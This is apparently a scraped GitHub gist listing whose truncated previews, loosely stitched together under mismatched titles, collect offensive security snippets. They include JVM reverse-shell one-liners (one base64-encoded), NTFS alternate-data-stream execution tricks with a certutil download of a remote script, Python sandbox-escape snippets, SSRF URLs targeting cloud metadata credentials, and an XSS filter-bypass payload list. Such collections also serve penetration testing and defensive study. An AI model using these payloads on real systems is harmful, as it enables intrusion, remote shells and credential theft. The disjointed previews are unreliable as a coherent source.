wflk / _deobfuscating-unminifying-obfuscated-web-app-code.md

Created March 18, 2024 17:02 — forked from 0xdevalias/_deobfuscating-unminifying-obfuscated-web-app-code.md

Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code

Deobfuscating / Unminifying Obfuscated Web App Code

	If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
	Write-Warning "This script will not function with administrative privileges. Please run as a normal user."
	Break
	}

	$outfile = "acltestfile"
	set-variable -name paths -value (Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment' -Name PATH).path.Split(";")
	Foreach ($path in $paths) {
	# This prints a table of ACLs
	# get-acl $path \| %{ $_.Access } \| ft -Wrap -AutoSize -property IdentityReference, AccessControlType, FileSystemRights

wflk / gist:b0586e379e2cee415ed37875b268fb7b

Created March 17, 2020 12:52

payload.ps1

start calc.exe

wflk / JVM_POST_EXPLOIT.md

Created January 16, 2020 13:28 — forked from frohoff/JVM_POST_EXPLOIT.md

JVM Post-Exploitation One-Liners

Nashorn / Rhino:

Reverse Shell

$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'

Reverse Shell (Base-64 encoded)

$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V

wflk / Exe_ADS_Methods.txt

Last active January 16, 2020 06:43 — forked from api0cradle/Exe_ADS_Methods.md

Execute from Alternate Streams

	###Add content to ADS###
	type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
	extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
	findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
	certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
	makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
	print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
	reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
	regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
	expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat

wflk / py-notes

Created September 18, 2019 16:45 — forked from luca-m/py-notes

	# >>> ACCESS TO ALL CLASSES ---------------------------------------------------

	().__class__.__bases__[0].__subclasses__()

	# >>> INSTIANTIATE NEW OBJECTS ------------------------------------------------

	[].__class__.__class__.__new__( <TYPE> , <SUBTYPE> )

	[c for c in ().__class__.__base__.__subclasses__() if c.__name__ == '<CLASSNAME>'][0]()

wflk / cloud_metadata.txt

Created September 16, 2019 09:31 — forked from BuffaloWill/cloud_metadata.txt

Cloud Metadata Dictionary useful for SSRF Testing

	## IPv6 Tests
	http://[::ffff:169.254.169.254]
	http://[0:0:0:0:0:ffff:169.254.169.254]

	## AWS
	# Amazon Web Services (No Header Required)
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
	http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]

wflk / xxsfilterbypass.lst

Created September 14, 2019 21:48 — forked from rvrsh3ll/xxsfilterbypass.lst

XSS Filter Bypass List

	';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	'';!--"<XSS>=&{()}
	0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
	<script/src=data:,alert()>
	<marquee/onstart=alert()>
	<video/poster/onerror=alert()>
	<isindex/autofocus/onfocus=alert()>
	<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
	<IMG SRC="javascript:alert('XSS');">
	<IMG SRC=javascript:alert('XSS')>

wflk / AccessChk.bat

Created September 13, 2019 06:46 — forked from api0cradle/AccessChk.bat

AppLocker hardening

	accesschk -w -s -q -u Users "C:\Program Files" >> programfiles.txt
	accesschk -w -s -q -u Everyone "C:\Program Files" >> programfiles.txt
	accesschk -w -s -q -u "Authenticated Users" "C:\Program Files" >> programfiles.txt
	accesschk -w -s -q -u Interactive "C:\Program Files" >> programfiles.txt
	accesschk -w -s -q -u "This Organization" "C:\Program Files" >> programfiles.txt
	accesschk -w -s -q -u "Authentication authority asserted identity" "C:\Program Files" >> programfiles.txt
	accesschk -w -s -q -u "Mandatory Label\Medium Mandatory Level" "C:\Program Files" >> programfiles.txt
	accesschk -w -s -q -u %username% "C:\Program Files" >> programfiles.txt

	accesschk -w -s -q -u Users "C:\Program Files (x86)" >> programfilesx86.txt

	using NtApiDotNet;
	using System;
	using System.Collections.Generic;
	using System.Diagnostics;
	using System.IO;
	using System.Linq;
	using System.Text;
	using System.Threading;
	using System.Threading.Tasks;

wflk

Deobfuscating / Unminifying Obfuscated Web App Code

Table of Contents